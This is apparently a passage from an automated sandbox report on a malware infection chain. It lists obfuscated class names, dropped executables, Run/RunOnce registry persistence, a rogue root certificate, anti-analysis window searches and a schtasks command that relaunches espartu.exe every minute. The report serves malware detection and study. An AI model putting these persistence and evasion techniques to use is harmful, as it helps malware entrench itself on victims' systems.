                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, V1cSAJJfhkJIt6UQCjN.csHigh entropy of concatenated method names: 'zXExkTXhx9', 'TVix0jhbdv', 'AS9xjNbiDS', 'XeJxusk98k', 'JmCxfb8hKs', 'I4FxIn7CXA', 'i55xOiM5Kt', 'HRNxZhhLsX', 'lZ8JOot1kg', 'sj8xPPTUQO'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, wmvEr9HuCjAco6JSpHc.csHigh entropy of concatenated method names: 'PHUO2R75x5', 'o1uOQ4PF42', 'Ewuu4gWA2YGtj6VBD2w', 'xjbLQaWNn0ThETvrJ2U', 'gUnx0AWjAXaeIb3pvix', 'hxsueOWyjej09xoi6IM', 'TTmOrOox7D', 'ufe0exW0ApA2LZXm8qZ', 'Ig8DElWuBQEPujA7fRH', 'pM6d7JWIXvgnplHyxXw'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, mJmX17oD9yNvbjgwU2.csHigh entropy of concatenated method names: 'sIJhuGbFB', 'EDhTnSXF9', 'E31eV4X5B', 'I\u04344', 'tDtSySooGv8ctDPgRgd', 'cjA6IjorGQOmHMwhFDJ', 'yFD15dohiKkVDikDmnx', 'fTvWo1oTVkwwxp6H4uJ', 'FHDDM8oedV6dD9io8qS', 'Bue4QcoarhoBQ7kS0Ka'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, i73GMgStvJiJY76EYcR.csHigh entropy of concatenated method names: 'K0NOVA5tTL', 'mNPn2vWacqQ1mul0dGJ', 'ddbKTCWbQo6iC7Tx9dw', 'wcvn9FWWJNRUcrwFZZM', 'QnmSCOZ297', 'AppS8sykjl', 'Dispose', 'USgSze4PdE', 'eTxOSPhAA0DPadoFjSw', 'kTj1g1hN5HwBI7gAZxk'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, utv96aS0vV0Go8FW2Er.csHigh entropy of concatenated method names: 'aiySqnHYl7', 'rQ7SEZZxZC', 's28ScN54xU', 'zjpS3OscsM', 'tEhS2jUhn5', 'E9uSQIyeEF', 'KLDSfY1eiW', 'VmTSIcdBOO', 'PKLSOeavJf', 'E0tSZ7sbpD'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, gCbguXgAbVYImA05lDO.csHigh entropy of concatenated method names: 'UD6g6iGBXe', 'ktAgyjcyMM', 'AmmgkpwZml', 'O2wg0N2ArG', 'tlDgugTk8S', 'A4pgfIor07', 'tOIgI6SeuT', 'YGBgOe5noi', 'd0CgZTfIL4', 'bpmgPjFmaR'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, j6qWdudZBZQyP0YoCGu.csHigh entropy of concatenated method names: 'qFOdYrcXFQ', 'RdtdxUYDu8', 'lnbO27T9Jh1Cddk7ahd', 'eODUbWTchQ9ycDy0llO', 'U1JXOgT3HxCBo8w4cnw', 'monPtvTpH51U920SFdF', 'kGbSD9TEqJyrhIsS54v', 'oHNf7fTRvBC6q5Xwngb'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, RHn8aPsGRQ0urfZqUV.csHigh entropy of concatenated method names: 'fLrO3qXEma', 'R0rdVhWScfrHcZrDswe', 'eVbiJQWlokhNCCq2Cri', 'IqJdq1WJKHoxMMgmMfY', 'yKDQN2WdQ4TWhgk9GFH', 'Field2', 'Field3', 'Dv27gup60', 'BFqupNrywh791nky9hB', 'KqxTQHrkZsMntpPS4tI'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, vsoRnulSaXy3sjFDCjO.csHigh entropy of concatenated method names: 'gHMldqBmRP', 'E1XlJrcvbF', 'ISYK9yhZ1oJtkF48sGK', 'IwHwSChPVvxaU3Icuwa', 'LXISjAhYoRfP60lI4eT', 'XNPnnbhxDUtYG1oYLPk', 'GYc7qEhMHRu5NDFkuDP', 'kcHC1LhIPVLOKh1nr62', 'idC2IThOEFhspvaEP5E'
                                Source: 5.2.RegAsm.exe.482040.2.raw.unpack, p817EtHUWCqDRsOwMeB.csHigh entropy of concatenated method names: 'l0KOKT5ERB', 'YFsElIW36bIWFpbv7ty', 'mXtMj2WRKVjTPETJ7Qo', 'Ggy5NSW2rQ2HZskVKVT', 'eTASBiG6Xo', 'rbRH5OoQ8h', 'GTbHv9HkJL', 'GOtHG57sGX', 'zPSHFiUWt9', 'xYLHXM4mED'

                                Persistence and Installation Behavior

                                barindex
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeJump to dropped file
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeFile created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\leg222[1].exeJump to dropped file

                                Boot Survival

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                                Source: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                                Source: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce espartu.exe
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeWindow searched: window name: FilemonClass
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeWindow searched: window name: RegmonClass
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeWindow searched: window name: FilemonClass
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeWindow searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeWindow searched: window name: Regmonclass
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeWindow searched: window name: Filemonclass
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce espartu.exe
                                Source: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce espartu.exe
                                Source: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce espartu.exe
                                Source: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce espartu.exe
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeFile opened: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe:Zone.Identifier read attributes | delete
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe:Zone.Identifier read attributes | delete
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe:Zone.Identifier read attributes | delete
                                Source: unknownNetwork traffic detected: HTTP traffic on port 58985 -> 8888
                                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 58985
                                Source: unknownNetwork traffic detected: HTTP traffic on port 21707 -> 59240
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
